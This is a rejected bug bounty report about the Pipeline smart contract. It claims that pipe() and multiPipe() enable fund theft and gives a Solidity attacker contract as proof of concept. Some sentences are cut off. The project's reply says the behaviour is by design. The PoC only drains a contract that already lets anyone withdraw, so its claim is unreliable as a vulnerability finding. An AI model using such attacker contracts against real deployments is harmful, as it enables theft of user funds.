Report #14504

Report Date
December 9, 2022

Theft of fund with Pipeline

Report Info

Report ID



Report type

Smart Contract


Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Has PoC?


Bug Description

The pipeline contract allows users to call any function on other protocols through the pipe() and multiPipe() functions. This means that an attacker could call a function on another contract that allows them to transfer funds out of that contract.


allows anyone to withdraw funds, an attacker could call that function through the pipeline contract and steal the funds from the other contract.

Risk Breakdown

Difficulty to Exploit: Medium Weakness: CVSS2 Score: 6


to include a requirement for users to provide proof of ownership of the funds they are attempting to transfer through the pipe() or multiPipe() functions.

Proof of concept

// Attacker contract contract Attacker { // Address of the Pipeline contract address pipelineAddress; // Address of the vulnerable contract address vulnerableAddress;

constructor(address _pipelineAddress, address _vulnerableAddress) public { pipelineAddress = _pipelineAddress; vulnerableAddress = _vulnerableAddress; }

// Function to call the vulnerable contract's withdrawFunds() function //through the Pipeline contract

function attack() public { // Create a PipeCall struct with the target set to the vulnerable contract's //address and the calldata set to the ABI-encoded withdrawFunds() //function call PipeCall memory call = PipeCall({ target: vulnerableAddress, data: abi.encodeWithSignature("withdrawFunds()") });

// Call the pipe() function on the Pipeline contract to execute the function //call on the vulnerable contract, which would allow the attacker to steal all of //the vulnerable contract's funds. IPipeline(pipelineAddress).pipe(call); } }

BIC Response

This is not a security bug report because the report outlines expected functionality. Pipeline was built with the philosophy that it is not the smart contract's role to protect users against misuse. See the Risk section of the Pipeline whitepaper: https://evmpipeline.org/pipeline.pdf#section.6

Due to these reasons, we are closing the submission and no reward will be issued.